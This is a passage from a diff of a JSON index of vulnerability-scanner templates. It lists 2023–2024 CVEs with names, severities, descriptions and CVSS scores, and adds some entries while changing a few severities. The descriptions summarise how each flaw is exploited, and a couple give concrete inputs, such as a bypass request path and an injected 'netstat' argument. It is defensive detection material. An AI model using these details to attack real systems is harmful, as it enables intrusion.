Local File Inclusion","Severity":"high","Description":"An attacker is able to read any file on the server hosting the H2O dashboard without any authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6038.yaml"} -{"ID":"CVE-2023-6063","Info":{"Name":"WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection","Severity":"high","Description":"The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6063.yaml"} +{"ID":"CVE-2023-6063","Info":{"Name":"WP Fastest Cache 1.2.2 - SQL Injection","Severity":"high","Description":"The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6063.yaml"} {"ID":"CVE-2023-6065","Info":{"Name":"Quttera Web Malware Scanner \u003c= 3.4.1.48 - Sensitive Data Exposure","Severity":"medium","Description":"The Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 doesn't restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site's code\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-6065.yaml"} {"ID":"CVE-2023-6114","Info":{"Name":"Duplicator \u003c 1.5.7.1; Duplicator Pro \u003c 4.5.14.2 - Unauthenticated Sensitive Data Exposure","Severity":"high","Description":"The Duplicator WordPress plugin before 1.5.7.1, Duplicator Pro WordPress plugin before 4.5.14.2 does not disallow listing the `backups-dup-lite/tmp` directory (or the `backups-dup-pro/tmp` directory in the Pro version), which temporarily stores files containing sensitive data. When directory listing is enabled in the web server, this allows unauthenticated attackers to discover and access these sensitive files, which include a full database dump and a zip archive of the site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6114.yaml"} {"ID":"CVE-2023-6360","Info":{"Name":"WordPress My Calendar \u003c3.4.22 - SQL Injection","Severity":"critical","Description":"WordPress My Calendar plugin versions before 3.4.22 are vulnerable to an unauthenticated SQL injection within the 'from' and 'to' parameters of the '/my-calendar/v1/events' REST route.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6360.yaml"} {"ID":"CVE-2023-6379","Info":{"Name":"OpenCMS 14 \u0026 15 - Cross Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6379.yaml"} {"ID":"CVE-2023-6380","Info":{"Name":"OpenCms 14 \u0026 15 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability has been found in the Open CMS product affecting versions 14 and 15 of the 'Mercury' template\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6380.yaml"} {"ID":"CVE-2023-6389","Info":{"Name":"WordPress Toolbar \u003c= 2.2.6 - Open Redirect","Severity":"medium","Description":"The plugin redirects to any URL via the \"wptbto\" parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6389.yaml"} +{"ID":"CVE-2023-6505","Info":{"Name":"Prime Mover \u003c 1.9.3 - Sensitive Data Exposure","Severity":"high","Description":"Prime Mover plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.9.2 via directory listing in the 'prime-mover-export-files/1/' folder. This makes it possible for unauthenticated attackers to extract sensitive data including site and configuration information, directories, files, and password hashes.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6505.yaml"} {"ID":"CVE-2023-6553","Info":{"Name":"Worpress Backup Migration \u003c= 1.3.7 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated threat actors to easily execute code on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6553.yaml"} {"ID":"CVE-2023-6567","Info":{"Name":"LearnPress \u003c= 4.2.5.7 - SQL Injection","Severity":"high","Description":"The LearnPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'order_by' parameter in all versions up to, and including, 4.2.5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6567.yaml"} {"ID":"CVE-2023-6623","Info":{"Name":"Essential Blocks \u003c 4.4.3 - Local File Inclusion","Severity":"critical","Description":"Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6623.yaml"} {"ID":"CVE-2023-6634","Info":{"Name":"LearnPress \u003c 4.2.5.8 - Remote Code Execution","Severity":"critical","Description":"The LearnPress plugin for WordPress is vulnerable to Command Injection in all versions up to, and including, 4.2.5.7 via the get_content function. This is due to the plugin making use of the call_user_func function with user input. This makes it possible for unauthenticated attackers to execute any public function with one parameter, which could result in remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6634.yaml"} +{"ID":"CVE-2023-6786","Info":{"Name":"Payment Gateway for Telcell \u003c 2.0.4 - Open Redirect","Severity":"medium","Description":"The plugin does not validate the api_url parameter before redirecting the user to its value, leading to an Open Redirect issue\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-6786.yaml"} {"ID":"CVE-2023-6831","Info":{"Name":"mlflow - Path Traversal","Severity":"high","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2023/CVE-2023-6831.yaml"} {"ID":"CVE-2023-6875","Info":{"Name":"WordPress POST SMTP Mailer \u003c= 2.8.7 - Authorization Bypass","Severity":"critical","Description":"The POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6875.yaml"} {"ID":"CVE-2023-6895","Info":{"Name":"Hikvision IP ping.php - Command Execution","Severity":"critical","Description":"A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6895.yaml"} {"ID":"CVE-2023-6909","Info":{"Name":"Mlflow \u003c2.9.2 - Path Traversal","Severity":"high","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6909.yaml"} {"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"} {"ID":"CVE-2023-6989","Info":{"Name":"Shield Security WP Plugin \u003c= 18.5.9 - Local File Inclusion","Severity":"critical","Description":"The Shield Security Smart Bot Blocking \u0026 Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6989.yaml"} -{"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"} +{"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"high","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"} {"ID":"CVE-2024-0195","Info":{"Name":"SpiderFlow Crawler Platform - Remote Code Execution","Severity":"critical","Description":"A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0195.yaml"} {"ID":"CVE-2024-0200","Info":{"Name":"Github Enterprise Authenticated Remote Code Execution","Severity":"critical","Description":"An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0200.yaml"} {"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"} {"ID":"CVE-2024-0235","Info":{"Name":"EventON (Free \u003c 2.2.8, Premium \u003c 4.5.5) - Information Disclosure","Severity":"medium","Description":"The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-0235.yaml"} +{"ID":"CVE-2024-0250","Info":{"Name":"Analytics Insights for Google Analytics 4 \u003c 6.3 - Open Redirect","Severity":"medium","Description":"The plugin is vulnerable to Open Redirect due to insufficient validation on the redirect oauth2callback.php file. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-0250.yaml"} {"ID":"CVE-2024-0305","Info":{"Name":"Ncast busiFacade - Remote Command Execution","Severity":"high","Description":"The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-0305.yaml"} {"ID":"CVE-2024-0337","Info":{"Name":"Travelpayouts \u003c= 1.1.16 - Open Redirect","Severity":"medium","Description":"The plugin is vulnerable to Open Redirect due to insufficient validation on the travelpayouts_redirect variable. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-0337.yaml"} {"ID":"CVE-2024-0352","Info":{"Name":"Likeshop \u003c 2.5.7.20210311 - Arbitrary File Upload","Severity":"critical","Description":"A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0352.yaml"} @@ -2358,12 +2371,14 @@ {"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"} {"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"} {"ID":"CVE-2024-1212","Info":{"Name":"Progress Kemp LoadMaster - Command Injection","Severity":"critical","Description":"Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1212.yaml"} +{"ID":"CVE-2024-1380","Info":{"Name":"Relevanssi (A Better Search) \u003c= 4.22.0 - Query Log Export","Severity":"medium","Description":"The Relevanssi Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1380.yaml"} {"ID":"CVE-2024-1561","Info":{"Name":"Gradio Applications - Local File Read","Severity":"high","Description":"Local file read by calling arbitrary methods of Components class\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-1561.yaml"} {"ID":"CVE-2024-1698","Info":{"Name":"NotificationX \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"The NotificationX - Best FOMO, Social Proof, WooCommerce Sales Popup \u0026 Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1698.yaml"} {"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"} {"ID":"CVE-2024-20767","Info":{"Name":"Adobe ColdFusion - Arbitrary File Read","Severity":"high","Description":"ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-20767.yaml"} {"ID":"CVE-2024-21644","Info":{"Name":"pyLoad Flask Config - Access Control","Severity":"high","Description":"pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-21644.yaml"} {"ID":"CVE-2024-21645","Info":{"Name":"pyload - Log Injection","Severity":"medium","Description":"A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-21645.yaml"} +{"ID":"CVE-2024-21683","Info":{"Name":"Atlassian Confluence Data Center and Server - Remote Code Execution","Severity":"high","Description":"Detects a Remote Code Execution vulnerability in Confluence Data Center and Server versions prior to X.X (affected versions). This issue allows authenticated attackers to execute arbitrary code.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2024/CVE-2024-21683.yaml"} {"ID":"CVE-2024-21887","Info":{"Name":"Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection","Severity":"critical","Description":"A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-21887.yaml"} {"ID":"CVE-2024-21893","Info":{"Name":"Ivanti SAML - Server Side Request Forgery (SSRF)","Severity":"high","Description":"A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-21893.yaml"} {"ID":"CVE-2024-22024","Info":{"Name":"Ivanti Connect Secure - XXE","Severity":"high","Description":"Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-22024.yaml"} @@ -2372,15 +2387,18 @@ {"ID":"CVE-2024-22927","Info":{"Name":"eyoucms v.1.6.5 - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting (XSS) vulnerability in the func parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-22927.yaml"} {"ID":"CVE-2024-23334","Info":{"Name":"aiohttp - Directory Traversal","Severity":"high","Description":"aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-23334.yaml"} {"ID":"CVE-2024-2340","Info":{"Name":"Avada \u003c 7.11.7 - Information Disclosure","Severity":"medium","Description":"The Avada theme for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.11.6 via the '/wp-content/uploads/fusion-forms/' directory. This makes it possible for unauthenticated attackers to extract sensitive data uploaded via an Avada created form with a file upload mechanism.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-2340.yaml"} +{"ID":"CVE-2024-23692","Info":{"Name":"Rejetto HTTP File Server - Template injection","Severity":"critical","Description":"This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-23692.yaml"} {"ID":"CVE-2024-2389","Info":{"Name":"Progress Kemp Flowmon - Command Injection","Severity":"critical","Description":"In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified. An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-2389.yaml"} {"ID":"CVE-2024-23917","Info":{"Name":"JetBrains TeamCity \u003e 2023.11.3 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.3 authentication bypass leading to RCE was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-23917.yaml"} {"ID":"CVE-2024-24131","Info":{"Name":"SuperWebMailer 9.31.0.01799 - Cross-Site Scripting","Severity":"medium","Description":"SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-24131.yaml"} +{"ID":"CVE-2024-24919","Info":{"Name":"Check Point Quantum Gateway - Information Disclosure","Severity":"high","Description":"CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-24919.yaml"} {"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"} {"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"} {"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"} {"ID":"CVE-2024-26331","Info":{"Name":"ReCrystallize Server - Authentication Bypass","Severity":"high","Description":"This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-26331.yaml"} {"ID":"CVE-2024-27198","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27198.yaml"} {"ID":"CVE-2024-27199","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"high","Description":"In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-27199.yaml"} +{"ID":"CVE-2024-27348","Info":{"Name":"Apache HugeGraph-Server - Remote Command Execution","Severity":"high","Description":"Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. However, versions prior to 1.3.0 are vulnerable to a remote command execution (RCE) vulnerability in the gremlin component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27348.yaml"} {"ID":"CVE-2024-27497","Info":{"Name":"Linksys E2000 1.0.06 position.js Improper Authentication","Severity":"high","Description":"Linksys E2000 Ver.1.0.06 build 1 is vulnerable to authentication bypass via the position.js file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27497.yaml"} {"ID":"CVE-2024-27564","Info":{"Name":"ChatGPT个人专用版 - Server Side Request Forgery","Severity":"high","Description":"A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the urlparameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27564.yaml"} {"ID":"CVE-2024-27954","Info":{"Name":"WordPress Automatic Plugin \u003c3.92.1 - Arbitrary File Download and SSRF","Severity":"critical","Description":"WordPress Automatic plugin \u003c3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27954.yaml"} @@ -2388,7 +2406,7 @@ {"ID":"CVE-2024-28255","Info":{"Name":"OpenMetadata - Authentication Bypass","Severity":"critical","Description":"OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. The `JwtFilter` handles the API authentication by requiring and verifying JWT tokens. When a new request comes in, the request's path is checked against this list. When the request's path contains any of the excluded endpoints the filter returns without validating the JWT. Unfortunately, an attacker may use Path Parameters to make any path contain any arbitrary strings. For example, a request to `GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/111` will match the excluded endpoint condition and therefore will be processed with no JWT validation allowing an attacker to bypass the authentication mechanism and reach any arbitrary endpoint, including the ones listed above that lead to arbitrary SpEL expression injection. This bypass will not work when the endpoint uses the `SecurityContext.getUserPrincipal()` since it will return `null` and will throw an NPE. This issue may lead to authentication bypass and has been addressed in version 1.2.4. Users are advised to upgrade. There are no known workarounds for this vulnerability. This issue is also tracked as `GHSL-2023-237`.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-28255.yaml"} {"ID":"CVE-2024-28734","Info":{"Name":"Coda v.2024Q1 - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability in Unit4 Financials by Coda v.2024Q1 allows a remote attacker to escalate privileges via a crafted script to the cols parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-28734.yaml"} {"ID":"CVE-2024-2876","Info":{"Name":"Wordpress Email Subscribers by Icegram Express - SQL Injection","Severity":"critical","Description":"The Email Subscribers by Icegram Express - Email Marketing, Newsletters, Automation for WordPress \u0026 WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'run' function of the 'IG_ES_Subscribers_Query' class in all versions up to, and including, 5.7.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-2876.yaml"} -{"ID":"CVE-2024-2879","Info":{"Name":"WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection","Severity":"critical","Description":"The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-2879.yaml"} +{"ID":"CVE-2024-2879","Info":{"Name":"WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection","Severity":"high","Description":"The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-2879.yaml"} {"ID":"CVE-2024-29059","Info":{"Name":".NET Framework - Leaking ObjRefs via HTTP .NET Remoting","Severity":"high","Description":".NET Framework Information Disclosure Vulnerability","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-29059.yaml"} {"ID":"CVE-2024-29269","Info":{"Name":"Telesquare TLR-2005KSH - Remote Command Execution","Severity":"critical","Description":"Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-29269.yaml"} {"ID":"CVE-2024-3097","Info":{"Name":"NextGEN Gallery \u003c= 3.59 - Missing Authorization to Unauthenticated Information Disclosure","Severity":"medium","Description":"The WordPress Gallery Plugin – NextGEN Gallery plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_item function in versions up to, and including, 3.59. This makes it possible for 